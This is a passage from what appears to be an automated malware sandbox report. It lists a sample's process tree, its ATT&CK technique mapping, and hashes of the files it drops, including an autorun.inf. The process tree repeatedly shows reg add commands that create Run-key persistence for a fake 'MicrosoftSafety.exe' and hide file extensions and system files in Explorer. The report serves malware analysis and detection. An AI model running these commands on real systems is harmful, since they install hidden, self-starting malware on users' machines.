    - Modifies visibility of file extensions in Explorer
    PID:540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:520
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1168
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:672
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:680
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1524
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1320
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1156
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:908
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:576
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:564
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:572
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1688
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:928
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:596
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:848
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1744
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1760
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1256
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1800
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:520

Network

MITRE ATT&CK Enterprise v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program File\Microsoft\MicrosoftSafety.exe

Filesize
276KB

MD5
6cdcb0900130b5cce6a2ae36868c1d9b

SHA1
05e2afbd095a163e6fac8822ed49ca565b688b39

SHA256
bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941

SHA512
5f4cb49137167656ca482fd4e1e98c02a7e4e51a65a70a48179183e36a87fdf91e0596273255e0d931d6205fa4c187bd078aefc20ea35dd1892aff643a7d21a0

Download Submit
C:\autorun.inf

Filesize
87B

MD5
a58e87ffeec377bdfe74aa489e222618

SHA1
ce4755bf320611f95b2e6fd8128a95d22b2680da

SHA256
fd5ee8d0b5bfe9e3d8e7088253d80602c554d62d2ee69ad9270722c251d6eff0

SHA512
1e5cf2c04ecc7e16dd26020c73a8a47059cce08f8224632621818d62dd00f928a1829e385db4cfbda1dc438dcc1187903556dd483d5786ebe6cfad915a459c66

Download Submit
memory/1740-114-0x0000000073291000-0x0000000073293000-memory.dmp

Filesize
8KB

Download
memory/1988-71-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/1988-56-0x0000000075281000-0x0000000075283000-memory.dmp

Filesize
8KB

Download
memory/1988-126-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads